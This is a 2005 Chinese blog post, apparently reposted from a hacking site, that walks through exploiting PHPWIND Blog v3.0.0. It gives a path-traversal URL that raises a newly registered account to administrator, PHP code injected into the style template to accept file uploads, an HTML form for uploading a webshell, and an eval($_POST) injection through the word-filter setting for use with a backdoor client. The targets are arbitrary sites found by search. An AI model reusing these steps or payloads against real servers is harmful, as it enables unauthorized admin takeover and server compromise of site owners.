2005/09/28 | PHPWINDBLOG漏洞利用
类别(软件破解及黑客技术) | 评论(0) | 阅读(360) | 发表于 10:28


来源:www.hackbase.com
今天在小安的blog上看到了他发的PHPWINDBLOG的漏洞利用工具.下载回来看了一下.说手动也很快的..(漏洞资料来源:BCT小组 www.cnbct.org )于是就在网上找了找关于这个的漏洞说明.可是搜索了半天也没有找到.上BCT看也没有看到.俺比较笨....
没办法.用工具看看吧.在百度上搜索phpwind v3.0.0 .返回好多的.
随便拿来一个试试.果然可以拿到webshell.但是利用工具毕竟不爽.于是抓包看了一下.总结了一下手动的方法.具体如下:

1.注册一个新的帐号.然后登陆.

2.成功登陆后,在地址栏输入:http://目标服务器/blog.php?uid_1.html(查看管理员帐号)

3.接着在地址栏输入: 目标服务器/user_index.php?action=../admin/manager&job=submit&username=你的注册帐号&password=你要设置的密码&check_pwd=你要设置的密码(这步是把你注册的帐号提升为管理员)

4.重新登陆就会在首页上发现多了个系统设置了.点击输入帐号密码就可以成功进入后台了.
(当然你也可以直接在地址栏输入http://目标服务器/amdin.php然后登陆你的帐号.)

5.拿webshell.
进后台找到“网站风格设置” 在里面加上以下代码,(切记)得要顶部写,代码如下:
<style type='text/css'>
</style>
<!--
EOT;
?>-->
<?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?>
<!--
<?php
print <<<EOT
-->

然后在本地新建一个提交表单代码如下:

<form ENCTYPE="multipart/form-data" ACTION="http://目标服务器/index.php"
METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input value=" 提交 " TYPE="submit">
</form>

提交之后在地址栏输入:http://目标服务器/你的马的名字.php就可以了.


后来想了想.这个好象拿webshell和phpwind论坛拿shell一样的.用安全管理里的词语替换写入 a']='aa';eval($_POST['a']);// 之后用lanker微型PHP后门客户端提交木马也可以.还有增加用户组什么的.但是后两种我没有测试.不知道可不可以行的通.大家自己测试吧.好了.写到这了!


注:请勿破坏,否则造成的一切后果自负!与本人无关.



0

评论Comments